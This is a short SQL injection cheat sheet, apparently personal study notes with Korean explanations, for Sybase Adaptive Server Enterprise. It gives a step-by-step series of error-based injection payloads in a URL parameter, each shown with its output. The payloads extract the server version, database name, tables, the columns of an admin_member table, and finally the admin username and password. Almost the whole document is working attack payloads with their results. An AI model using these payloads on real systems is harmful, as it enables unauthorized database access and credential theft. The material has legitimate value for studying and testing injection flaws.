DBMS version

=> Adaptive Server Enterprise/12.5.3/EBF 13325http://test.com/index.php?idx=1 or 1=convert(numeric,(select @@@version))#

current_db

=> testdbhttp://test.com/index.php?idx=1 or 1=convert(numeric,(select db_name()))# // current_db

Tables of current_db

=> members:123456http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,id)) from testdb..sysobjects where type=0x55))#

=> temp:24680http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,id)) from testdb..sysobjects where type=0x55 and id not in(123456)))#

=> admin_member:74653http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,id)) from testdb..sysobjects where type=0x55 and id not in(123456,24680)))#

Columns of selected table(admin_member)

=> name:10http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,colid)) from testdb..syscolumns where id=74653)))#

=> id:1http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,colid)) from testdb..syscolumns where id=74653 and colid not in(10))))#

=> passwd:2http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,colid)) from testdb..syscolumns where id=74653 and colid not in(10,1)))#

Data of select table(admin_member)

=> admin:1234http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||id||0x3a||passwd) from admin_member))#

max(): 내림차순
min(): 오름차순
convert(데이터타입,value): value를 지정한 데이터 타입으로 변경
sysobjects: One row for each table, view, procedure, rule, trigger default, log, and (in tempdb only)
temporary object
syscolumns: One row for each column in a table or view, and for each parameter in a procedure
type 0x55 = 'U': 사용자가 생성한 테이블
not in(데이터): 데이터에 포함 된 것은 제외